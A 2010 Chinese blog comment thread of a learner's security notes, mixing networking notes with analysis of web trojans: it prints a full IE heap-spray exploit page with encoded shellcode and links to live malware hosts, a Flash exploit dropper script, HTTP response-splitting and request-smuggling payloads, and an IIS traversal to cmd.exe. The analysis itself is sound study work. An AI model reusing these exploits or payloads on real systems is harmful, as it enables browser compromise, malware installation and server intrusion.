小默

評(píng)論

# XSS(Cross Site Scripting，跨站) 2010-11-10 17:05 小默

適用：動(dòng)態(tài)站點(diǎn)，靜態(tài)站點(diǎn)不受其影響。
目的：竊取用戶信息。如竊取Session等。
偽裝：一般將鏈接編碼，避免用戶懷疑它的合法性，騙取用戶點(diǎn)擊。  回復(fù)  更多評(píng)論   

# re: C 語言樓 2010-11-10 18:18 小默

掃描器掃出來的，不知道怎么用T_T
  回復(fù)  更多評(píng)論   

# 一個(gè)網(wǎng)馬分析1 2010-11-10 22:13 小默

view-source:http://youth.dlmu.edu.cn/news/rss/news.php?1548.html

查找<script
<script src=http://202.201.48.18/dwtzb/mxd/xd.png?36036000></script>
但是這個(gè)東西是嵌在<html></html>中的，不會(huì)執(zhí)行？ TODO

不管能不能執(zhí)行了，先看下是什么吧。
chrome不能查看.png格式的源碼。手動(dòng)GET：
[green@colorfulgreen ~]$ telnet 202.201.48.18 80
Trying 202.201.48.18...
Connected to 202.201.48.18.
Escape character is '^]'.
GET /dwtzb/mxd/xd.png?26026000 HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 14:08:51 GMT
Server: Apache/2.0.48 (Unix) PHP/5.2.0
Last-Modified: Thu, 26 Aug 2010 17:48:08 GMT
ETag: "12f820-14a-99d9e600"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: image/png
X-Pad: avoid browser bug

document.writeln("<iframe src=http://202.201.48.18/dwtzb/mxd/bie.html width=100 height=0></iframe>");
document.writeln("<iframe src=http://202.201.48.18/dwtzb/mxd/bie6.html width=100 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="  回復(fù)  更多評(píng)論   

# 一個(gè)網(wǎng)馬分析2 2010-11-10 22:36 小默

看下第一個(gè)iframe嵌的頁面
http://202.201.48.18/dwtzb/mxd/bie.html


<div id=sun style='display:none'>MM528384NNXX%u0C0C%u9090%u10EB%u4B5B%uC933%uB966%u047B%u3480%uC20B%uFAE2%u05EB%uEBE8%uFFFF%u2BFF%uC13D%uC2C2%uA69D%uF263%uC2C2%u49C2%uCE82%uB249%u6FDE%uAA49%u49CA%uA835%u9BCD%u5D2A%uC2C1%u52C2%u3A20%uF1AA%uC2F0%uAAC2%uB197%uB0A7%u4996%uCE84%u2D2A%uC2C0%u49C2%uA82A%u9BC3%uBD2A%uC2C1%u20C2%uAA3B%uACAD%uC2C2%uB7AA%uAEB0%u96AF%u8449%u2ACE%uC012%uC2C2%u2A49%uC3A8%u2A9B%uC1A2%uC2C2%u3B20%uAEAA%uF0F1%uAAC2%uAAB1%uAEA7%u4996%uCE84%u732A%uC2C0%u49C2%uA82A%u9BC3%u832A%uC2C1%u20C2%u433B%uC22E%uC2C3%u49C2%u431E%u4201%uC2C2%uA8C2%uA8C2%u91D8%uC2A8%u943D%uF186%u8202%uFE42%uC2C1%u3BB7%u444B%uC252%uC2C2%uC605%u9EC1%uECA3%u05A7%uC186%uBAC6%uC2A7%uF1C2%u930B%u9193%u9395%u02F1%u8449%u2A82%uC09C%uC2C2%u3A41%uCDC2%uBD47%uC2C3%uA8C2%uA8C2%uA8C2%uA8C1%uA8C2%uAAC0%uC2C2%u02C2%u4991%uE684%uFF2A%uC2C0%u41C2%u3D3A%u46CD%uC39C%uC2C2%u844B%uA8A2%u92C2%u943D%u4BEA%uA684%u4449%uC252%uC2C2%uC605%u9EC1%uECA0%u05A7%uC186%uBAC6%uC2A7%uA8C2%uA8C2%uA8C2%uA8C0%uA8C2%uAAC2%uC2C2%u82C2%u4991%uE684%u392A%uC2C3%u41C2%u3D3A%u46CD%uC3DE%uC2C2%u444B%uC246%uC2C2%u5C4B%uC24E%uC2C2%u8449%uA8A2%uA8C2%uA8C2%u49C2%uA284%u3D92%uFA94%u8405%uC2B2%uC2C2%u05C2%uB684%uC2C2%uC2C2%u0543%uC0C2%uC2C2%u19F1%u9C49%uA8A6%u4FC2%uB284%uAA92%uC6C2%uC2C2%u3D95%uA2B4%u943D%uF1C6%u7B0B%uC6C2%uC2C2%uBE42%u3DCD%uB657%u42CE%uCDBE%uC23D%uC7B6%uB642%u3DCD%u2057%u4929%uEF01%uC6C2%uC2C2%u3A41%uBDC2%u4BC1%uB29C%uC2A8%u844F%u92B6%uB43D%u95B2%u743D%uC246%uC2C2%u943D%u43F2%uC229%uC2C6%u41C2%uC239%u67BD%uB43D%u3DA2%uF694%u743D%uC246%uC2C2%u943D%u49F6%u5244%uC2C2%u49C2%u4E5C%uC2C2%u05C2%uC1C6%uA39E%uA7EC%u3D91%uEE94%u7C49%uC24E%uC2C2%u4449%uC252%uC2C2%uC605%u9EC5%uECA0%u43A7%uC22E%uC2C3%u49C2%uAA1E%uC3C2%uC2C2%uAA91%uC3C2%uC2C2%uA895%uA8C2%u3DC2%uDE94%u3949%u02F1%u19F1%u2E43%uC0C2%uC2C2%u0E49%u3A41%uBF96%u4BCA%uC3DE%u0241%u29C6%u4931%u490E%u411B%uD201%u02F1%u9392%u9291%u9292%u9292%u9592%u9292%u8449%u2ACA%uC3C4%uC2C2%uBC49%u2AFE%uC390%uC2C2%uF52A%uC2C2%uAAC2%uB4A1%uC2B5%uB1AA%uA6AA%u96AD%u8449%u2ACE%uC274%uC2C2%u844B%uA6FE%uC663%uC2C2%u4FC2%uA262%u3D3D%uA83D%u3DA7%uFEB4%u8449%u2AD2%uC258%uC2C2%u19F1%u9191%u9191%u123D%uC12A%uC2C3%u43C2%uC22E%uC2C3%u49C2%u413E%uC605%uC505%uB6F0%uCE53%u8505%uA1C6%u134B%u058D%uCA85%uA762%u0955%u8505%u93CE%u7882%u05BD%uD285%uDFFC%uFB74%u8505%u7AD6%u16AB%u05D9%uDA85%uBD7C%u62A4%u8505%u3EDE%uF56B%u056F%uE285%uC85A%u3AD2%u63A6%uC2F2%uC2C2%u8249%u49CE%uDEB2%u496F%uCAAA%u3549%u944B%uA8A6%u9BC6%u032A%uC2C2%u52C2%u3A20%uF1AA%uC2F0%uAAC2%uB197%uB0A7%u4996%u2AC4%uC2D0%uC2C2%u2A49%uC7A8%u2A9B%uC260%uC2C2%u3B20%u3DF1%u3D95%uC694%uFA42%uB62A%u42D0%u2BFA%uCFB6%uFA42%uB629%u3DCA%u2A22%uC2A2%uC2C2%u4301%uC7BA%u5252%u5252%uCAB6%u3D49%u4997%u4F2E%uC782%u223D%u852A%uC2C2%u01C2%uFA42%uB62A%u42D0%u2BFA%uCFB6%uFA42%uB629%u3DCA%u2A22%uC2F2%uC2C2%u4301%uC7BA%u5252%u5252%u1AB6%uCAAA%uC2C8%u4FC2%uC782%u223D%uD52A%uC2C2%u01C2%uD32A%uC2C2%u7AC2%uC3D3%u42C6%uCE00%u29C2%u9AC0%u2A01%u3D3B%u3D3D%u0499%u7AC5%u9D4B%uA4C3%u8505%u3DC7%u0122%u4991%u911E%u82A8%uC2AA%uC2D2%u95C2%u8449%u2AE2%u3DAA%u3D3D%u019A%u9493%uB749%u49FE%uECB6%uC1BA%u9437%uB449%uC1E2%uF137%u8B0B%u6F83%u07C1%u19F1%u7CCD%uF8D2%uB614%u03CA%uC509%u18C1%u2982%uF933%uB7DD%u9C25%u9C49%uC1E6%uA41F%uCE49%u4989%uDE9C%u1FC1%uC649%uC149%u6907%u9B9C%u2A01%u393E%u3D3D%u3070%u3620%uF470%uD1CD%u8A32%uFFB9%uB6F0%uCE53%u1D47%u796D%u4BA1%u8D13%u8293%uBD78%u50C5%uB2E0%u66DC%u2DA6%uF051%u5626%uD14C%u6EC8%uFBBB%u5A24%u4F06%uB6DD%uA495%u3DCF%u7C81%u196E%uC85A%u3AD2%u1442%u586D%u9139%uA4D7%uB6AA%uB2B6%uEDF8%uF0ED%uF0F2%uF0EC%uF3F2%uF6EC%uECFA%uFAF3%uA6ED%uB6B5%uA0B8%uAFED%uA6BA%uAFED%uF3BA%uA7EC%uA7BA%uC2C2%uC2C2YY</div>

<BUTTON ID='EXP' ONCLICK='exp();' STYLE='DISPLAY:NONE'></BUTTON>
<script language="JavaScript">
function code()
{
var div=document.getElementById('sun'); //獲取屬性值
var decode=div.innerHTML; //返回表格行開始和結(jié)束標(biāo)簽之間的所有內(nèi)容
var x=decode.indexOf('MM');
var y=decode.indexOf('NN');
var xxcode=decode.substring(x+2,y);
return xxcode; //返回MM和NN之間的數(shù)據(jù)，在這里是528384
}
function sc()
{
var div=document.getElementById('sun');
var decode=div.innerHTML;
var x=decode.indexOf('XX');
var y=decode.indexOf('YY')
var cc=decode.substring(x+2,y);
cc=unescape(cc);
return cc; //返回解密后的XX和YY之間的數(shù)據(jù)，也就是余下的全部
}

function exp()
{
var d=document.createElement('DIV');
d.addBehavior('#default#userData');
document.appendChild(d);
try{for (i=0;i<10;i++)
{d.setAttribute('s',window);}}
catch(e){}
window.status+='';
}
var memory;
var temptest = decodeURI(',sun,0c0c,sun,0c0c');
var nop=unescape(temptest.replace(/,sun,/g,'%u'));
var SC=sc();
var xcode=code()-SC.length*2;
while(nop.length <= xcode) nop+=nop;
nop=nop.substring(0,xcode - SC.length);
memory=new Array();
for(i=0;i<0x100;i++){memory[i]=nop + SC;}

CollectGarbage();
document.getElementById('EXP').onclick();
</script>

-------------
<div id=sun
下面的一堆代碼是shellcode，解密后有下面exe文件：
http://202.201.48.18/dwtzb/mxd/mx1.exe  回復(fù)  更多評(píng)論   

# innerHTML 2010-11-11 10:34 小默

innerHTML返回開始和結(jié)束標(biāo)簽之間的所有內(nèi)容
以下例子，alert框彈出<th>FirstName</th><th>Lastname</th>
<html>
<head>
<script type="text/javascript">
function getInnerHTML(){
alert(document.getElementById("tr1").innerHTML);
}
</script>
</head>
<body>
<table border="1">
<tr id="tr1"><th>FirstName</th><th>Lastname</th></tr>
<tr id="tr2"><td>Peter</td><td>Griffin</td></tr>
</table>
<input type="botton" onclick="getInnerHTML()" value="Alert innerHTML of table row">
</body>
</html>
  回復(fù)  更多評(píng)論   

# addBehavior Method 2010-11-11 10:58 小默

addBehavior使不需要使用CSS就能指定對(duì)象的行為。只針對(duì)IE。
偷懶了，直接用msdn上的一個(gè)例子。
光標(biāo)移到LI標(biāo)簽的元素上，該元素就顯示紅色。
http://samples.msdn.microsoft.com/workshop/samples/components/htc/refs/addBehavior.htm
  回復(fù)  更多評(píng)論   

# 擴(kuò)展名 執(zhí)行 注冊(cè)表 2010-11-11 17:26 小默

HKEY_CLASSES_ROOT\.ini
默認(rèn)值是inifile
有些病毒會(huì)把inifile改成exefile，導(dǎo)致.ini結(jié)尾的文件可以按exe執(zhí)行  回復(fù)  更多評(píng)論   

# 一個(gè)迷惑人的flash網(wǎng)馬 2010-11-11 18:37 小默

http://bbs.ikaka.com/showtopic-8629683-1.aspx
by 軒轅小蔥大牛
=======
下面是一個(gè)js腳本中的一段代碼：
try{var l;
//嘗試創(chuàng)建新的SWF9的ActiveX對(duì)象，并獲得對(duì)象中$version屬性的值，將其保存到變量Flashver中。
Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version");}
//使用變量l捕獲錯(cuò)誤
catch(l){};
finally{if(l!="[object Error]"){ //當(dāng)不出現(xiàn)[object Error]錯(cuò)誤，說明系統(tǒng)存在這個(gè)ActiveX控件并可用
if(Flashver.indexOf("9,0,16,")>0||Flashver.indexOf("9,0,28,")>0||Flashver.indexOf("9,0,45,")>0||Flashver.indexOf("9,0,47,")>0||Flashver.indexOf("9,0,64,")>0||Flashver.indexOf("9,0,115,")>0){ //檢查Flachver中是否包含特定的版本號(hào)字樣，如果是，說明漏洞存在
//在漏洞存在的情況下，使用Flashver變量為參數(shù)訪問flash.asp，從而得到真正的惡意代碼內(nèi)容。
document.write('<iframe style=display:none src="}}

Flashver的值源于對(duì)象中的$version屬性，在用于IE組件的SWF9控件中該屬性的值的形式為"win 9,0,x,0"，其中x是副版本號(hào)，也就是該代碼最關(guān)心的依據(jù)。
符合條件的版本值如下
win 9,0,16,0
win 9,0,28,0
win 9,0,45,0
win 9,0,47,0
win 9,0,64,0
win 9,0,115,0

以win 9,0,16,0為例，iframe中嵌入的鏈接地址為http://30mm.azzwg.cn/cb/ff/flash.asp?id=win%209,0,16,0
(Flashver中的空格給escape了)

上面這個(gè)鏈接得到的網(wǎng)頁內(nèi)容：
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">YES</div>
<script type=text/javascript>var so=new SWFObject("GG16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");</ScripT>

所以真正的畸形swf文件地址是http://30mm.azzwg.cn/cb/ff/GG16.swf

-----
原來的flash網(wǎng)馬分析實(shí)踐中，我們經(jīng)?？吹骄W(wǎng)頁中加載的.swf文件是ie.swf或ff.swf
其實(shí)這兩個(gè)文件并不是觸發(fā)漏洞的畸形swf文件，其功能只是獲取SWF控件版本并連接到真正的畸形swf文件。
其使用的方法，正是在swf中加入腳本，通過獲取$version屬性，使用 $version+".swf" 的形式生成相應(yīng)的畸形swf文件地址并調(diào)用相應(yīng)函數(shù)加載之，從而觸發(fā)漏洞。

因此我們?cè)倏幢咎岬降哪_本代碼，就可以發(fā)現(xiàn)，以上這種判斷flash控件版本以加入相應(yīng)地址的方法，其實(shí)只是原來的方法的“外化”。由于現(xiàn)在的代碼直接以javascript的方式表現(xiàn)出來，而不是編譯在swf文件中，所以實(shí)際上比原來更簡(jiǎn)單更容易判斷了。  回復(fù)  更多評(píng)論   

# ASCII表 2010-11-12 22:35 小默

Bin Dec Hex 縮寫/字符 解釋
00000000 0 00 NUL(null) 空字符
00000001 1 01 SOH(start of headling) 標(biāo)題開始
00000010 2 02 STX (start of text) 正文開始
00000011 3 03 ETX (end of text) 正文結(jié)束
00000100 4 04 EOT (end of transmission) 傳輸結(jié)束
00000101 5 05 ENQ (enquiry) 請(qǐng)求
00000110 6 06 ACK (acknowledge) 收到通知
00000111 7 07 BEL (bell) 響鈴
00001000 8 08 BS (backspace) 退格
00001001 9 09 HT (horizontal tab) 水平制表符
00001010 10 0A LF (NL line feed, new line) 換行鍵
00001011 11 0B VT (vertical tab) 垂直制表符
00001100 12 0C FF (NP form feed, new page) 換頁鍵
00001101 13 0D CR (carriage return) 回車鍵
00001110 14 0E SO (shift out) 不用切換
00001111 15 0F SI (shift in) 啟用切換
00010000 16 10 DLE (data link escape) 數(shù)據(jù)鏈路轉(zhuǎn)義
00010001 17 11 DC1 (device control 1) 設(shè)備控制1
00010010 18 12 DC2 (device control 2) 設(shè)備控制2
00010011 19 13 DC3 (device control 3) 設(shè)備控制3
00010100 20 14 DC4 (device control 4) 設(shè)備控制4
00010101 21 15 NAK (negative acknowledge) 拒絕接收
00010110 22 16 SYN (synchronous idle) 同步空閑
00010111 23 17 ETB (end of trans. block) 傳輸塊結(jié)束
00011000 24 18 CAN (cancel) 取消
00011001 25 19 EM (end of medium) 介質(zhì)中斷
00011010 26 1A SUB (substitute) 替補(bǔ)
00011011 27 1B ESC (escape) 溢出
00011100 28 1C FS (file separator) 文件分割符
00011101 29 1D GS (group separator) 分組符
00011110 30 1E RS (record separator) 記錄分離符
00011111 31 1F US (unit separator) 單元分隔符
00100000 32 20 (space) 空格
00100001 33 21 !
00100010 34 22 "
00100011 35 23 #
00100100 36 24 $
00100101 37 25 %
00100110 38 26 &
00100111 39 27 '
00101000 40 28 (
00101001 41 29 )
00101010 42 2A *
00101011 43 2B +
00101100 44 2C ,
00101101 45 2D -
00101110 46 2E .
00101111 47 2F /
00110000 48 30 0   回復(fù)  更多評(píng)論   

# HTTP截?cái)?HTTP走私 2010-11-13 01:28 小默

http://netsecurity.51cto.com/art/201001/177371.htm
----------

概述

對(duì)特定的HTTP報(bào)頭的攻擊。

HTTP截?cái)喙?br>利用缺乏輸入消毒措施的漏洞，允許入侵者向應(yīng)用程序響應(yīng)的頭部插入CRL和LF字符，從而將響應(yīng)分割成兩個(gè)不同的HTTP消息。
該攻擊的目標(biāo)既不同于緩存投毒，也不同于跨站腳本攻擊。 //TODO

HTTP走私攻擊
一些專門精心制作的HTTP消息可能會(huì)隨著接收它們的代理的不同，而作不同的解析和解釋。
要求對(duì)HTTP消息的各種代理相當(dāng)熟悉，否則無法發(fā)動(dòng)這種攻擊。

------
HTTP截?cái)喙艉诤袦y(cè)試

一些web應(yīng)用程序會(huì)使用部分用戶輸入來生成它們的響應(yīng)頭部的某些值。如重定向，目標(biāo)url依賴于用戶提交的某些值。
舉例來說，假如用戶被要求在標(biāo)準(zhǔn)web接口和高級(jí)web接口之間做出選擇，然后，選擇的結(jié)果將作為一個(gè)參數(shù)傳遞，并且這個(gè)參數(shù)將用于觸發(fā)重定向到相應(yīng)的頁面的應(yīng)答頭中。也就是，用選擇用參數(shù)來標(biāo)識(shí)，參數(shù)用于頁面應(yīng)答頭中，用來觸發(fā)重定向。
如果該參數(shù)的interface的值是advanced，那么應(yīng)用程序?qū)㈨憫?yīng)下列內(nèi)容：


HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2009 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced">http://victim.com/main.jsp?interface=advanced


//TODO 什么意思？

收到這個(gè)消息后，瀏覽器把用戶引向Location頭部指定的頁面。
如果應(yīng)用程序不過濾用戶輸入，攻擊者在參數(shù)interface中插入序列%0d%0a，將能夠觸發(fā)一個(gè)響應(yīng)，并且解釋器（如介于用戶和web應(yīng)用之間的web緩存）會(huì)把這個(gè)響應(yīng)解釋成兩個(gè)不同的響應(yīng)。從而攻擊者可以通過給這個(gè)web緩存“投毒”使它為后續(xù)的請(qǐng)求提供虛假內(nèi)容。

假設(shè)攻擊者使用以下內(nèi)容作為參數(shù)interface進(jìn)行傳遞：

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length%2035%0d%0aSorry,%20System%20Down

即：
advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

Sorry, System Down

沒有對(duì)用戶輸入進(jìn)行嚴(yán)格消毒的應(yīng)用程序中得到的響應(yīng)將是下面的內(nèi)容：

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2009 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced">http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

Sorry, System Down

Web緩存將看到兩個(gè)不同的響應(yīng)。如果攻擊者發(fā)送第一個(gè)請(qǐng)求后，以及發(fā)送另外一個(gè)請(qǐng)求，請(qǐng)求/index.html，Web緩存就會(huì)認(rèn)為和第二個(gè)響應(yīng)相匹配，并緩存第二個(gè)響應(yīng)內(nèi)容。這樣，后面所有指向victim.cm/index.html的請(qǐng)求都會(huì)收到system down的消息。

通過這種方式，能夠有效涂改站點(diǎn)在使用Web緩存的用戶心中的形象。
如果這個(gè)Web緩存是Web應(yīng)用程序的一個(gè)反向代理的話，這個(gè)Web應(yīng)用程序在整個(gè)因特網(wǎng)的用戶都會(huì)受到影響。 //TODO.類似于搜狗瀏覽器的上國(guó)際網(wǎng)代理？
另外，攻擊者還可以向這些用戶傳輸發(fā)動(dòng)跨站腳本攻擊的js代碼，竊取cookie等。

查找這個(gè)漏洞，需要識(shí)別能影響一個(gè)或多個(gè)頭部的用戶輸入，并檢查是否能夠在其中注入一個(gè)CR+LF序列。和這個(gè)攻擊關(guān)機(jī)密切的兩個(gè)頭部：
Location
Set-Cookie

利用這個(gè)漏洞比較復(fù)雜，要考慮一些因素：
1.要使偽造的響應(yīng)被緩存：必須正確設(shè)置其中各個(gè)頭部，如Last-Modified頭部的值必須設(shè)為將來的一個(gè)時(shí)間；必須破壞目標(biāo)頁面先前的緩存版本，方法是提交一個(gè)請(qǐng)求頭部中帶有"Pragma: no-cache"的前導(dǎo)頁面來防止頁面被緩存。
2.應(yīng)用程序可能過濾了發(fā)動(dòng)攻擊所需的其它字符，如<>等。可以嘗試使用其他編碼，如UTF-7等。
3.某個(gè)攻擊目標(biāo)（如ASP）會(huì)對(duì)Location頭部（如www.victim.com/redirect.asp）中的路徑部分進(jìn)行URL編碼處理，這樣CRLF序列不起作用了。但是它們不能對(duì)查詢部分（如?interface=advanced）進(jìn)行這樣的編碼處理，這意味著放置一個(gè)前導(dǎo)問號(hào)就能夠繞過這種過濾技術(shù)。

-----------
HTTP走私攻擊黑盒測(cè)試

利用的漏洞：某些精心構(gòu)造的HTTP消息會(huì)隨不同的代理（瀏覽器、web緩存、應(yīng)用程序防火墻）而做不同的解釋。

這里只介紹一種：繞過應(yīng)用程序防火墻。

針對(duì)IIS服務(wù)器的Unicode目錄遍歷攻擊能夠通過提交下面請(qǐng)求發(fā)動(dòng)攻擊：
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ //TODO
通過檢查url是否存在類似".."和"cmd.exe"可以檢測(cè)和過濾掉這種攻擊。
但是IIS 5.0對(duì)POST請(qǐng)求主體的的長(zhǎng)度限制為48KB。當(dāng)Content-Type頭部不同于application/x-www-form-urlencode時(shí)，查出該限制的部分會(huì)被全部截?cái)唷?br>IIS對(duì)請(qǐng)求主體的長(zhǎng)度有限制，但Web應(yīng)用防火墻對(duì)請(qǐng)求主體的長(zhǎng)度沒有這個(gè)限制。

攻擊者可以創(chuàng)建一個(gè)很大的請(qǐng)求：
POST /target.asp HTTP/1.1 <-- Request #1
Host: target
Connection: Keep-Alive
Content-Length: 49225

<49152 bytes of garbage>
POST /target.asp HTTP/1.0 <-- Request #2
Connection: Keep-Alive
Content-Length: 33

POST /target.asp HTTP/1.0 <-- Request #3
xxxx: POST /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 <-- Request #4
Connection: Keep-Alive


這里Request #1由49223字節(jié)組成，所以Qequest #1還包含了Request #2的幾行內(nèi)容，防火墻能看到#1但無法看到#2。同樣能看到#3卻無法看到#4（因?yàn)樵揚(yáng)OST正好是偽造的頭部xxxx部分？）。
IIS 5.0將在49152字節(jié)（48K）無用信息后停止對(duì)Request #1的解析。并將Request #2解析為一個(gè)新的、單獨(dú)的請(qǐng)求。#2內(nèi)容為33字節(jié)，正好到xxxx:之前的所有內(nèi)容。IIS 5.0看不到#3，因?yàn)?3被解釋成#2的一部分。但是IIS會(huì)認(rèn)出#4。
于是該#4不會(huì)被防火墻發(fā)現(xiàn)，但能被IIS正確解析和執(zhí)行。

利用：利用各種支持HTTP的設(shè)備在解析不兼容1005 RFC的消息時(shí)采用不同方式，來發(fā)動(dòng)攻擊。如：
HTTP協(xié)議只允許一個(gè)Content-Length頭部，但沒有規(guī)定如何處理具有兩個(gè)Content-Length頭部的消息。一些將使用第一個(gè)，而另一些將使用第二個(gè)，這種情況下就容易遭到HTTP走私的攻擊。
另一個(gè)例子是GET消息中Content-Length頭部的使用。  回復(fù)  更多評(píng)論   

# 兩類windows漏洞臨時(shí)解決方案 2010-11-13 21:33 小默

允許在受影響的系統(tǒng)上遠(yuǎn)程執(zhí)行代碼，但必須要求用戶交互才能利用這些漏洞。
臨時(shí)解決方案：不交互

--

某服務(wù)（如DHCP Server）中存在漏洞。
臨時(shí)解決方案：不安裝/開啟相關(guān)服務(wù)；防火墻封堵相關(guān)端口（如UDP 67/68）。

  回復(fù)  更多評(píng)論   

# 配合代理腳本 實(shí)現(xiàn)訪問內(nèi)外網(wǎng)站的自動(dòng)轉(zhuǎn)換 2010-11-13 22:20 小默

起因：公司啟動(dòng)了內(nèi)部OA（辦公自動(dòng)化）系統(tǒng)。但不同部門不在一個(gè)局域網(wǎng)內(nèi)。

解決方案1： VPN接入。
方案1缺陷：不同部門用不同ISP接入互聯(lián)網(wǎng)，VPN服務(wù)器配置不一致。 //TODO VPN配置方法

解決方案2： 使用代理服務(wù)器。 //TODO 代理服務(wù)器是公司自己架一臺(tái)服務(wù)器，還是在ISP租一臺(tái)？自己架的話放到哪兒？
方案2缺陷：訪問OA時(shí)需要在IE中設(shè)置代理服務(wù)器；訪問互聯(lián)網(wǎng)時(shí)需要取消代理服務(wù)器的設(shè)置。每次都需要手動(dòng)配置很麻煩。
解決辦法：使用代理自動(dòng)配置腳本（PAC-file: Proxy Auto-Config file）。

PAC腳本：以.PAC為擴(kuò)展名的Javascript腳本，實(shí)際上就是定義一個(gè)名為FindProxyForURL的js函數(shù)，該函數(shù)會(huì)被瀏覽器自動(dòng)調(diào)用，從而實(shí)現(xiàn)代理服務(wù)器的自動(dòng)轉(zhuǎn)換。

function findproxyforurl(host, url) //js不區(qū)分大小寫
{
if(shexpmatch(host,"*.jifang.com.cn")) //訪問內(nèi)網(wǎng)OA域名，使用代理
return "proxy 218.xxx.xxx.30:8080"
else if(shexpmatch(host, "172.16.*.*")) //訪問內(nèi)容某ip地址，使用代理
return "proxy 218.xxx.xxx.30:8080"
else //其它直接連接
return "direct"
}  回復(fù)  更多評(píng)論   

# Cisco IOS 初始配置 2010-12-07 09:35 小默

——路由器模式——
Router>enable // 進(jìn)入特權(quán)exec模式
Router#configure terminal // 進(jìn)入全局配置模式
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#exit // 退出全局配置模式
Router#disable // 退出特權(quán)exec模式

——打開路由器電源后——
1、硬件測(cè)試：內(nèi)存、接口
2、加載IOS鏡像，即路由器操作系統(tǒng)
3、查找并使用配置信息

——虛擬配置注冊(cè)表——
  回復(fù)  更多評(píng)論   

# 插樓 - DNS查詢 首選DNS 備用DNS 2010-12-08 18:55 小默

http://betternextday.spaces.live.com/Blog/cns!91CB16EB3BCAAC7B!395.entry
---------------------------
Windows系統(tǒng)中DNS查詢的原理.首先,Windows操作系統(tǒng)中,對(duì)DNS的相應(yīng)方式是,使用第一個(gè)應(yīng)答.就先來先用.然后我們來分析一下查詢的機(jī)制(并不是第一個(gè)DNS完全失敗以后才用第二個(gè)DNS)
如果只有一塊網(wǎng)卡的情況下:

1. 客戶端向網(wǎng)卡上配置的首選DNS發(fā)送查詢請(qǐng)求,并等待1秒.
2. 如果1秒內(nèi)無響應(yīng)(哪怕因?yàn)榫W(wǎng)絡(luò)延遲未能傳到機(jī)器也算),客戶端再次向首選DNS服務(wù)器發(fā)送查詢請(qǐng)求,等待2秒鐘
3. 如果這2秒鐘內(nèi)依然沒有相應(yīng),客戶端會(huì)向所有配置過的DNS服務(wù)器同時(shí)發(fā)出查詢請(qǐng)求(包括首選).并等待2秒鐘您看到的文章來自活動(dòng)目錄seo http://gnaw0725.blogbus.com/c1404551/

4. 如果這2秒鐘內(nèi)還是沒有相應(yīng). 客戶端會(huì)向所有配置過的DNS服務(wù)器同時(shí)發(fā)出查詢請(qǐng)求(包括首選).并等待4秒鐘
5. 如果這4秒鐘內(nèi)還是沒有相應(yīng). 客戶端會(huì)向所有配置過的DNS服務(wù)器同時(shí)發(fā)出查詢請(qǐng)求(包括首選).并等待8秒鐘
6. 如果8秒內(nèi)依然沒有相應(yīng)的話,客戶端停止查詢,并且在DNS的緩存中做一個(gè)Negative的記錄,表示這個(gè)名字的DNS不存在.
另外還有多網(wǎng)卡的情況,也有略微的不同.
具體可以參考這篇文章:
DNS Processes and Interactions

http://technet.microsoft.com/en-us/library/dd197552.aspx  回復(fù)  更多評(píng)論